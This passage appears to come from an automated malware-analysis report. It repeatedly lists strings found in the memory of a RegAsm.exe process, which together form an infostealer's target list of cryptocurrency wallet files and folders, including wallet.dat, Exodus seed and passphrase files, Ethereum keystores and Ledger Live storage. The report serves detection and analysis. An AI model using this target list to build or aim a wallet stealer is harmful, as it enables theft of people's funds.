Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2728395939.000000000118D000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: exodus.*
Source: RegAsm.exe, 00000003.00000002.2728395939.000000000118D000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: ethereum.*
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron 